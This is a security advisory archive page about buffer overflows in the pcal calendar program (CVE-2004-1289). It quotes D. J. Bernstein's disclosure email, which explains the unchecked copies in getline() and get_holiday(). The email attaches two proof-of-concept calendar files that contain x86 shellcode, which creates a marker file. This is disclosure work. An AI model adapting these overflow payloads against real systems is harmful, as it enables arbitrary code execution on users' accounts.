SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Calendar)  >   pcal Vendors:   pcal.sourceforge.net
pcal Buffer Overflows Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012592
SecurityTracker URL:  http://securitytracker.com/id/1012592
CVE Reference:   CVE-2004-1289   (Links to External Site)
Updated:  Jan 6 2005
Original Entry Date:  Dec 16 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.7.1
Description:   Two vulnerabilities were reported in pcal. A remote user can cause arbitrary code to be executed by the target user.

D. J. Bernstein reported that a remote user can create a specially crafted calendar file that, when processed by the target user with pcal, will execute arbitrary code on the target user's system. The code will run with the privileges of the target user.

The buffer overflows reside in the getline() function in 'pcalutil.c' and the get_holiday() function in 'readfile.c'.

Danny Lungstrom is credited with discovering these flaws.

Impact:   A remote user can cause arbitrary code to be executed by the target user with the privileges of the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  pcal.sourceforge.net/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jan 6 2005 (Debian Issues Fix) pcal Buffer Overflows Let Remote Users Execute Arbitrary Code
Debian has released a fix.



 Source Message Contents

Subject:  [remote] [control] pcal 4.7.1 getline overflows tmpbuf; get_holiday overflows tmp



--PEIAKu/WMn1b1Hv9
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Danny Lungstrom, a student in my Fall 2004 UNIX Security Holes course,
has discovered two remotely exploitable security holes in pcal. I'm
publishing this notice, but all the discovery credits should be assigned
to Lungstrom.

You are at risk if you receive a calendar file through email (or a web
page or any other source that could be controlled by an attacker) and
feed that file through pcal. Whoever provides the calendar file then has
complete control over your account: he can read and modify your files,
watch the programs you're running, etc.

The pcal documentation does not tell users to avoid taking input from
the network. In fact, one can easily find web pages that supply calendar
files for public use.

Proof of concept: On an x86 computer running FreeBSD 4.10, as root, type

   cd /usr/ports/print/pcal
   make install

to download and compile the pcal program, version 4.7.1 (current). Then,
as any user, save the file 71-1.cal attached to this message, and type

   pcal -f 71-1.cal > 71-1.ps

with the unauthorized result that a file named ``exploited'' is created
in the current directory. The file 71-2.cal has the same effect but uses
another buffer overflow. (I tested these with a 525-byte environment, as
reported by printenv | wc -c.)

Here are the bugs: In pcalutil.c, getline() copies any amount of data
into a fixed-length tmpbuf array. In readfile.c, get_holiday() uses an
unprotected strcpy() to copy data into a fixed-length tmp array.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago

--PEIAKu/WMn1b1Hv9
Content-Type: text/plain; charset=unknown-8bit
Content-Disposition: attachment; filename="71-1.cal"
Content-Transfer-Encoding: quoted-printable

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=D4=F7=BF=
=BFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=EB%Y1=C0@@@=C1=E0=
=07P=B8=124V=02=C1=E8=18=C1=E0=08PQ1=C0=B0=05P=CD=801=C0P@P=CD=80=E8=D6=FF=
=FF=FFexploited=00
--PEIAKu/WMn1b1Hv9
Content-Type: text/plain; charset=unknown-8bit
Content-Disposition: attachment; filename="71-2.cal"
Content-Transfer-Encoding: quoted-printable

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAh=F7=BF=BFAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=EB%Y1=C0@@@=C1=E0=07P=B8=124V=02=
=C1=E8=18=C1=E0=08PQ1=C0=B0=05P=CD=801=C0P@P=CD=80=E8=D6=FF=FF=FFexploited
something here...

--PEIAKu/WMn1b1Hv9--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC